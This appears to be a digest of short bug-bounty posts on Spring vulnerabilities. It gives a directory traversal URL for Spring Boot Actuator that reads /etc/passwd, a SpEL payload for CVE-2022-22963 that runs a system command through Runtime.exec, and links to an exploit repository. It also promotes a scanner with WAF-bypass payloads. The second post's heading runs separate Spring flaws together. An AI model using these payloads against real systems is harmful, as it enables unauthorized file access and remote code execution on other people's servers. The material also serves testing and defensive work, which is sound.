Spring Boot Actuator — Logview Directory Traversal (CVE-2021-21234)

https://localhost:8887/manage/log/view?filename=/etc/passwd&base=../../../../../

Details:
https://pyn3rd.github.io/2021/10/25/CVE-2021-21234-Spring-Boot-Actuator-Logview-Directory-Traversal/

#spring #actuator #cve #bugbounty

SpringShell: Spring Core RCE
(CVE-2022-22963)

PoC Payload:
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("xcalc")

Research:
https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html

Exploit:
https://github.com/craig/SpringCore0day

#spring #exploit #rce #cve

Spring4Shell Scan

A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities

Features:
— Support for lists of URLs.
— Fuzzing for more than 10 new Spring4Shell payloads (previously seen tools uses only 1-2 variants).
— Fuzzing for HTTP GET and POST methods.
— Automatic validation of the vulnerability upon discovery.
— Randomized and non-intrusive payloads.
— WAF Bypass payloads.

https://github.com/fullhunt/spring4shell-scan

#spring4shell #spring #scan #tools